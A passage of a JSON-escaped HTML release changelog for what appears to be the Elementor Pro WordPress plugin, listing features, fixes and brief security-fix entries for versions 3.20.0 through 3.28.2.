screen<\\/li>\\n<\\/ul>\\n<h4>3.28.2 - 2025-03-30<\\/h4>\\n<ul>\\n<li>Fix: Default Elementor animation shown for logged-out users when using an "External URL" source in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.28.1 - 2025-03-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline and Form widgets<\\/li>\\n<\\/ul>\\n<h4>3.28.0 - 2025-03-17<\\/h4>\\n<ul>\\n<li>Tweak: Ensured File Upload field styles are overridden by global styles in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11651\\\">#11651<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17223\\\">#17223<\\/a>)<\\/li>\\n<li>Tweak: Updated Scroll Snap description to clarify incompatibility with animations and motion effects<\\/li>\\n<li>Tweak: Prevented special characters from being encoded in the email subject field in Form widget<\\/li>\\n<li>Tweak: Loaded module styles within the module instead of registering them in <code>plugin.php<\\/code><\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.5<\\/li>\\n<li>Tweak: Improved keyboard accessibility for menus in Editor Top Bar<\\/li>\\n<li>Tweak: Made the edit button accessible in the Template widget<\\/li>\\n<li>Tweak: Optimized Form widget performance by caching field assets <code>using get_style_depends()<\\/code> and <code>get_script_depends()<\\/code> methods<\\/li>\\n<li>Tweak: Added Text Shadow control in Testimonial Carousel, Call to Action and Animated Headline widgets<\\/li>\\n<li>Fix: Button icon alignment breaks when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16077\\\">#16077<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16511\\\">#16511<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17692\\\">#17692<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17922\\\">#17922<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19253\\\">#19253<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19370\\\">#19370<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21236\\\">#21236<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21844\\\">#21844<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28080\\\">#28080<\\/a>)<\\/li>\\n<li>Fix: Dropdown caret color did not follow menu item color when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17500\\\">#17500<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18466\\\">#18466<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21664\\\">#21664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24929\\\">#24929<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28064\\\">#28064<\\/a>)<\\/li>\\n<li>Fix: Page doesn\'t scroll up when a coupon error notice appears in Checkout widget<\\/li>\\n<\\/ul>\\n<h4>3.27.7 - 2025-03-13<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.27.6 - 2025-03-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Template Condition<\\/li>\\n<\\/ul>\\n<h4>3.27.5 - 2025-03-03<\\/h4>\\n<ul>\\n<li>Fix: The <code>wp_trigger_error<\\/code> function causes the site to crash instead of triggering a warning when used with ACF text<\\/li>\\n<\\/ul>\\n<h4>3.27.4 - 2025-02-16<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Screenshots module<\\/li>\\n<li>Security Fix: Improved code security enforcement in Query control<\\/li>\\n<li>Fix: ACF <code>true_false<\\/code> field causing a fatal error when used as a dynamic tag with third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/30170\\\">#30170<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.27.3 - 2025-02-06<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Stripe Button widget<\\/li>\\n<\\/ul>\\n<h4>3.27.2 - 2025-02-03<\\/h4>\\n<ul>\\n<li>Fix: Value type configuration issue causing errors when using ACF<\\/li>\\n<li>Fix: Hide content on responsive breakpoint option is not working on WordPress Menu widget when Optimized Markup experiment is activated<\\/li>\\n<\\/ul>\\n<h4>3.27.1 - 2025-01-27<\\/h4>\\n<ul>\\n<li>Tweak: Increased the number of items allowed in Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<li>Security Fix: Improved code security enforcement in Global widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Admin settings<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Empty custom fields are missing in the Dynamic Tags options in Display Conditions for Elements<\\/li>\\n<\\/ul>\\n<h4>3.27.0 - 2025-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Removed the <code>elementor-widget-container<\\/code> div from the Menu, Loop, Table of Contents, Form, and Hotspot widgets as part of the Optimized Markup experiment to improve HTML structure<\\/li>\\n<li>Tweak: Reduced DOM size by optimizing the submit button markup in Search widget<\\/li>\\n<li>Tweak: Moved style loading to the head instead of the footer to improve CLS<\\/li>\\n<li>Tweak: Enabled conditional loading of Swiper.js based on widget dependencies to reduce unnecessary assets and improve page load times<\\/li>\\n<li>Tweak: Standardized navigation elements like arrows and bullets across all carousel and slider widgets for improved accessibility<\\/li>\\n<li>Tweak: Improved accessibility when the submit button has only an icon and no text in Search widget<\\/li>\\n<li>Tweak: Removed <code>load_plugin_textdomain()<\\/code> function from Elementor Pro<\\/li>\\n<\\/ul>\\n<h4>3.26.3 - 2025-01-07<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Search widget<\\/li>\\n<li>Fix: Height issues cause slideshow thumbnails to display incorrectly in Media Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29663\\\">#29663<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.2 - 2024-12-22<\\/h4>\\n<ul>\\n<li>Fix: Menu items are not clickable in various scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29191\\\">#29191<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.26.1 - 2024-12-17<\\/h4>\\n<ul>\\n<li>Fix: Restore deprecated <code>Plugin::enqueue_styles()<\\/code> function to avoid errors with 3rd party plugins<\\/li>\\n<\\/ul>\\n<h4>3.26.0 - 2024-12-16<\\/h4>\\n<ul>\\n<li>New: Introducing dynamic content support for Off-canvas in Loop Grid widget templates - enabling seamless display of additional content dynamically (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29049\\\">#29049<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28935\\\">#28935<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7106\\\">#7106<\\/a>)<\\/li>\\n<li>New: AdBlock Detection trigger for Popups - display targeted popups for visitors using ad blockers<\\/li>\\n<li>New: Added Reload Page link action for Dynamic Tags<\\/li>\\n<li>Tweak: Added "Space Between Dots" control to Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2526\\\">#2526<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3277\\\">#3277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21697\\\">#21697<\\/a>)<\\/li>\\n<li>Tweak: Replaced hidden <code>elementor-screen-only<\\/code> div with <code>aria-label<\\/code> attributes<\\/li>\\n<li>Tweak: Removed <code>elementor-widget-container<\\/code> div from Elementor widgets as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Optimize popup styling by loading it only when necessary<\\/li>\\n<li>Tweak: Updated Gap between slides control to support only PX units in Carousel widget<\\/li>\\n<li>Tweak: Removed the dependency between the Tabs handler and the Menu handler<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> in Carousel widgets<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=carousel<\\/code> to carousel wrapper<\\/li>\\n<li>Tweak: Added <code>aria-roledescription=slide<\\/code> to slide wrapper<\\/li>\\n<li>Tweak: Optimized carousel widgets markup as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Updated minimum required Safari version to 15.5<\\/li>\\n<li>Tweak: Facebook widgets are no longer supported on mobile due to Facebook functionality changes<\\/li>\\n<li>Fix: Motion Effects sticky feature is not working when Scroll Snap is enabled<\\/li>\\n<li>Fix: Custom Image Resolution option is not working in Gallery widget<\\/li>\\n<li>Fix: \'Reading Settings\' unexpectedly reduces the number of posts displayed when using the Archive with Pagination setting<\\/li>\\n<li>Fix: Step Form does not scroll to the top when the first field is not an input field in Form widget<\\/li>\\n<li>Fix: Display Condition feature is available without an active Elementor license in Floating Elements<\\/li>\\n<li>Fix: Background options of Flip Box in Loop Grid widget are not working when images are added using ACF Dynamic Tags<\\/li>\\n<li>Fix: Dropdown icon in the Select field of the Form widget is cut off when the Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Incompatibility between Form widget and WPML when using Nested Elements<\\/li>\\n<li>Fix: Performance issues when changing the title name in the Menu widget<\\/li>\\n<li>Fix: Warnings appear when Element Caching is set to Inactive in Carousel widgets<\\/li>\\n<li>Fix: Swiper styling missing from Lightbox inside Gallery widgets<\\/li>\\n<\\/ul>\\n<h4>3.25.5 - 2024-12-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: Accessible navigation in popups caused unintended scrolling of the page when triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29175\\\">#29175<\\/a>)<\\/li>\\n<li>Fix: Popup overlay shown for non-logged users even when disabled<\\/li>\\n<\\/ul>\\n<h4>3.25.4 - 2024-11-20<\\/h4>\\n<ul>\\n<li>Tweak: Improved Global Widget loading method to enhance performance<\\/li>\\n<\\/ul>\\n<h4>3.25.3 - 2024-11-13<\\/h4>\\n<ul>\\n<li>Fix: Nested Elements are activated even when the Container experiment is inactive<\\/li>\\n<\\/ul>\\n<h4>3.25.2 - 2024-11-03<\\/h4>\\n<ul>\\n<li>Fix: Styling issues affecting popup layout when using a Dynamic Tag to open the popup<\\/li>\\n<li>Fix: Image captions are not displaying for non-logged-in users in Media Carousel widget<\\/li>\\n<li>Fix: Custom Add to Cart widget with Quantity enabled causes critical error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/29159\\\">#29159<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.25.1 - 2024-10-31<\\/h4>\\n<ul>\\n<li>Fix: Multiple Custom Add to Cart widgets on the same page are adding the same product<\\/li>\\n<\\/ul>\\n<h4>3.25.0 - 2024-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added pagination functionality to the Live Results in Search widget<\\/li>\\n<li>Tweak: Added Anchor Offset control to allow precise positioning when scrolling to anchor links on the page<\\/li>\\n<li>Tweak: Load motion effects styles only when they are in use<\\/li>\\n<li>Tweak: Load sticky styles only when they are in use<\\/li>\\n<li>Tweak: Load popup styles only when they are in use<\\/li>\\n<li>Tweak: Load theme builder styles only when they are in use<\\/li>\\n<li>Tweak: Load transition styles for Call to Action and Gallery widgets only when they are in use<\\/li>\\n<li>Tweak: Load styles for Form widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for WooCommerce widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Theme Elements widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Carousel widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Pricing widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Floating Elements separately to enhance performance<\\/li>\\n<li>Tweak: Load styles for Link in Bio widgets separately to enhance performance<\\/li>\\n<li>Tweak: Load minified CSS in the Loop Builder\'s Call to Action button in the Editor<\\/li>\\n<li>Tweak: Removed "Payments" module styles<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Payapl widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Removed <code>elementor-button-wrapper<\\/code> div from Stripe widget as part of the Optimized Markup experiment<\\/li>\\n<li>Tweak: Merged "Form Submissions" feature into the version and moved it to the Advanced tab<\\/li>\\n<li>Tweak: Merged "Display Conditions" into the version<\\/li>\\n<li>Fix: Missing translation string for the empty message in the Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27580\\\">#27580<\\/a>)<\\/li>\\n<li>Fix: Local Storage and Session Storage were being used even when popups were not in use (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7151\\\">#7151<\\/a>)<\\/li>\\n<li>Fix: Masonry layout is not working when pagination is set to "Load More" or "Infinite Scroll" in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23684\\\">#23684<\\/a>)<\\/li>\\n<li>Fix: Extra gap between widgets on the frontend when using Off-canvas widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27706\\\">#27706<\\/a>)<\\/li>\\n<li>Fix: Pagination and custom queries did not work when the Posts Widget was saved as a Global Widget or used via shortcode<\\/li>\\n<li>Fix: Lightbox videos are missing controls and displayed at the wrong size in Media Carousel widget<\\/li>\\n<li>Fix: Pagination options with Individual Pagination not working as expected in Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Justified or Masonry layouts for the Pro Gallery would not display images on the frontend when inserted via nested tabs<\\/li>\\n<li>Fix: Error issue in the Loop Grid widget when used in theme parts with the Taxonomy Filter<\\/li>\\n<li>Fix: Removed the focus ring after clicking to open the Off Canvas inside the Editor<\\/li>\\n<li>Fix: Background gradient colors from the dynamic color tag values are not rendering on the frontend<\\/li>\\n<li>Fix: Excessive database requests generated by the Loop Grid widget<\\/li>\\n<li>Fix: Colors from Dynamic Tags were not rendered on the frontend<\\/li>\\n<li>Fix: Display issue in the Menu widget caused by the \'Native Intersection Observer API<\\/li>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget<\\/li>\\n<li>Fix: Content Width control inside the Mega Menu is displaying an empty value<\\/li>\\n<\\/ul>\\n<h4>3.24.4 - 2024-10-09<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<\\/ul>\\n<h4>3.24.3 - 2024-10-01<\\/h4>\\n<ul>\\n<li>Fix: Floating Elements template not loading when Single Page template is set with All Singular condition<\\/li>\\n<li>Fix: Form field styles not loading properly in various scenarios<\\/li>\\n<\\/ul>\\n<h4>3.24.2 - 2024-09-18<\\/h4>\\n<ul>\\n<li>Fix: Icons not displaying when Inline SVG Icons experiment is active in Link In Bio widgets and Floating Elements<\\/li>\\n<\\/ul>\\n<h4>3.24.1 - 2024-09-12<\\/h4>\\n<ul>\\n<li>Fix: Widget styles not loading correctly on front causing alignment inconsistencies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28676\\\">#28676<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.24.0 - 2024-09-10<\\/h4>\\n<ul>\\n<li>New: Introducing support for Variable Fonts - allowing for more dynamic and flexible text styling (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6703\\\">#6703<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11333\\\">#11333<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19277\\\">#19277<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25485\\\">#25485<\\/a>)<\\/li>\\n<li>Tweak: Added \'Structure\' indication for widgets with Display Conditions applied (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28027\\\">#28027<\\/a>)<\\/li>\\n<li>Tweak: Added a new option for setting the live search results width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28280\\\">#28280<\\/a>)<\\/li>\\n<li>Tweak: Improved Honeypot field functionality in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28480\\\">#28480<\\/a>)<\\/li>\\n<li>Tweak: Added options to \'Copy\', \'Paste\', and \'Clear\' Display Conditions in Context Menu<\\/li>\\n<li>Tweak: Improved performance of the Menu widget when using Dynamic Tags in the URL field<\\/li>\\n<li>Tweak: Improved performance when using Dynamic Tags in Nested Elements<\\/li>\\n<li>Tweak: Added the option for users to disable Akismet for specific Elementor forms<\\/li>\\n<li>Tweak: Adjusted URL structure when presenting the Search Archive page in Search widget<\\/li>\\n<li>Tweak: Added the \'Create Template\' button in Search widget<\\/li>\\n<li>Tweak: Added an option to enable the \'Loader\' animation while live results are loading in Search widget<\\/li>\\n<li>Tweak: Load share buttons compatibility styles only when they are in use<\\/li>\\n<li>Tweak: Load dialog styles only when they are in use<\\/li>\\n<li>Tweak: Load global widget styles only during Editor preview<\\/li>\\n<li>Tweak: Conditionally load widget styles only when the widgets are used<\\/li>\\n<li>Tweak: Load styles for CTA hover animations only when they are in use<\\/li>\\n<li>Tweak: Load notes styles only when the WordPress Toolbar is displayed<\\/li>\\n<li>Tweak: Split <code>animations.min.css<\\/code> into multiple CSS files and load them conditionally<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Stable status<\\/li>\\n<li>Tweak: Merged Taxonomy Filter feature into the version<\\/li>\\n<li>Tweak: Merged Search feature into the version<\\/li>\\n<li>Tweak: Added a note to \'Current Query\' explaining the impact of WordPress settings on pagination within Archives<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for the Off-Canvas widget<\\/li>\\n<li>Fix: Manual Selection option is not excluding sticky posts in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18689\\\">#18689<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23331\\\">#23331<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28179\\\">#28179<\\/a>)<\\/li>\\n<li>Fix: Template ID does not change according to the imported Loop Item (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21404\\\">#21404<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22202\\\">#22202<\\/a>)<\\/li>\\n<li>Fix: \'Editing Mode\' for the Off-canvas was not functioning correctly in certain scenarios<\\/li>\\n<li>Fix: Added definition to <code>clear_custom_image_sizes<\\/code> hook to prevent edge case issues<\\/li>\\n<li>Fix: Flickering issue with search result buttons when closing results using the keyboard escape key in Search widget<\\/li>\\n<li>Fix: Theme Style settings for buttons were overriding the text styling in Search widget<\\/li>\\n<li>Fix: Nesting menu inside another menu causes functionality issues in Menu widget<\\/li>\\n<li>Fix: Error when using array as custom fields value in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.23.3 - 2024-08-05<\\/h4>\\n<ul>\\n<li>Fix: Dropdown area not working in certain scenarios in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28194\\\">#28194<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.23.2 - 2024-07-29<\\/h4>\\n<ul>\\n<li>Fix: Horizontal scroll bar appearing on the page when using Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28087\\\">#28087<\\/a>)<\\/li>\\n<li>Fix: Dropdown area disappearing in certain scenarios in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.23.1 - 2024-07-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in link URL<\\/li>\\n<\\/ul>\\n<h4>3.23.0 - 2024-07-15<\\/h4>\\n<ul>\\n<li>New: Search Widget with Live Results - Display live search results as visitors type into the search box, enhancing user experience and engagement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27664\\\">#27664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24931\\\">#24931<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21459\\\">#21459<\\/a>)<\\/li>\\n<li>Tweak: Renamed <code>width<\\/code> to <code>Min width<\\/code> and added <code>Max width<\\/code> control to Hotspot tooltips (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18930\\\">#18930<\\/a>)<\\/li>\\n<li>Tweak: Applied a logical DOM order to the Mega Menu widget to improve accessibility<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for WordPress Menu widget<\\/li>\\n<li>Tweak: Added the ability to set <code>aria-label<\\/code> for Menu widget<\\/li>\\n<li>Tweak: Added a bottom option to the Image Position control in Call to Action widget<\\/li>\\n<li>Fix: Missing version string in included CSS query string when Improved CSS Loading is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21879\\\">#21879<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23821\\\">#23821<\\/a>)<\\/li>\\n<li>Fix: Form submission icon message does not display correctly when Inline Font Icons feature is activated<\\/li>\\n<li>Fix: Save and Close button position issues in the conditions screen in Theme Builder.<\\/li>\\n<li>Fix: Focus appears on the first element when using the mouse to open Off-Canvas <\\/li>\\n<li>Fix: Links to Elementor Settings are broken in various locations<\\/li>\\n<li>Fix: Conditions field not showing all relevant conditions in Theme Builder<\\/li>\\n<li>Fix: Off-Canvas flickering in sticky containers with exit animations triggered by sticky effects<\\/li>\\n<\\/ul>\\n<h4>3.22.1 - 2024-06-24<\\/h4>\\n<ul>\\n<li>Fix: Styling of Global widgets not loading when Element Caching experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27704\\\">#27704<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.22.0 - 2024-06-16<\\/h4>\\n<ul>\\n<li>New: Introducing Off-Canvas widget - create engaging and creative layers triggered by a link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6225\\\">#6225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21769\\\">#21769<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25770\\\">#25770<\\/a>)<\\/li>\\n<li>Tweak: Added option to remove \'User IP\' and \'User Agent\' from the form submissions metadata (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14285\\\">#14285<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>waypoints.js<\\/code> library with the native Intersection Observer API<\\/li>\\n<li>Tweak: Extended Alignment and Position capabilities in Form widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Flip Box widget<\\/li>\\n<li>Tweak: Moved icon View control to style tab in Call to Action widget<\\/li>\\n<li>Tweak: Optimized Form widget to eliminate unnecessary markup when the button icon is empty<\\/li>\\n<li>Tweak: Optimized Posts widget to eliminate unnecessary markup when Load More button text is empty<\\/li>\\n<li>Tweak: Remove <code>placeholder<\\/code> arguments from URL controls<\\/li>\\n<li>Tweak: Implemented CSS logical properties to Icon Position in Form, Posts and Menu Cart widgets<\\/li>\\n<li>Tweak: Activated Display Conditions feature for existing sites<\\/li>\\n<li>Tweak: Activated Taxonomy Filter feature for existing sites<\\/li>\\n<li>Tweak: Added functionality to delay the running of the ready triggers on inner elements<\\/li>\\n<li>Fix: Icons are now part of the link in the Menu Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24298\\\">#24298<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25112\\\">#25112<\\/a>)<\\/li>\\n<li>Fix: <code>all: unset<\\/code> assigned to buttons cause focus issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24322\\\">#24322<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25448\\\">#25448<\\/a>)<\\/li>\\n<li>Fix: Menu cart SVG icon disappears on front when Optimized Control Loading experiment is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/27342\\\">#27342<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro auto-updates are not working on multisite networks (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12615\\\">#12615<\\/a>)<\\/li>\\n<li>Fix: PHP error appears in the editor when using Loop Grid in an archive template<\\/li>\\n<li>Fix: UI glitch on Icon Position control in Paypal and Stripe Buttons widgets<\\/li>\\n<li>Fix: Icon Position control RTL issue in Hotspot widget<\\/li>\\n<li>Fix: Manual Selection "Include By" Query doesn\'t work with product categories<\\/li>\\n<\\/ul>\\n<h4>3.21.3 - 2024-05-20<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Loop Grid widget<\\/li>\\n<li>Fix: License expired affects the Display Conditions functionality in the front end<\\/li>\\n<\\/ul>\\n<h4>3.21.2 - 2024-04-30<\\/h4>\\n<ul>\\n<li>Fix: Special characters are not displayed correctly when using the Excerpt widget in Loop template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25860\\\">#25860<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.21.1 - 2024-04-24<\\/h4>\\n<ul>\\n<li>Fix: Excerpt Length setting doesn\'t function correctly for languages with non-English characters in Post Excerpt widget<\\/li>\\n<\\/ul>\\n<h4>3.21.0 - 2024-04-15<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Taxonomy Query - Enabling the display of post and product categories and tags within Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21372\\\">#21372<\\/a>)<\\/li>\\n<li>Tweak: Optimized Hotspot widget to prevent rendering when no image is provided<\\/li>\\n<li>Tweak: Optimized Blockquote widget to eliminate unnecessary markup when devoid of content<\\/li>\\n<li>Tweak: Optimized Template widget to eliminate unnecessary markup when no template is selected<\\/li>\\n<li>Tweak: Optimized Code Highlight widget to eliminate unnecessary markup when there is no content<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Portfolio widget<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Author Avatar image alt text in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25440\\\">#25440<\\/a>)<\\/li>\\n<li>Tweak: Notes feature merged to version<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Profile Picture alt text in Author widget<\\/li>\\n<li>Fix: Display issue on hover state in WooCommerce Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.20.3 - 2024-04-10<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issue between the My Account widget and other third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20986\\\">#20986<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.20.2 - 2024-03-26<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Post Navigation widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Gallery widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.20.1 - 2024-03-20<\\/h4>\\n<ul>\\n<li>Fix: Strengthened code integrity in deprecated Woo Single Element widget<\\/li>\\n<li>Fix: PHP error notice appears when using Loop Grid with the Taxonomy Filter widgets<\\/li>\\n<\\/ul>\\n<h4>3.20.0 - 2024-03-11<\\/h4>\\n<ul>\\n<li>Tweak: Implemented OR logic in the Display Conditions feature<\\/li>\\n<li>Tweak: Added X and Threads social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25299\\\">#25299<\\/a>)<\\/li>\\n<li>Tweak: Added Archive Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Alt dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Caption dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Bio dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Email dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Website dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Page Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Post Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Comments Number rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Archive Author rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added support for WordPress Custom Fields in Display Conditions feature<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a 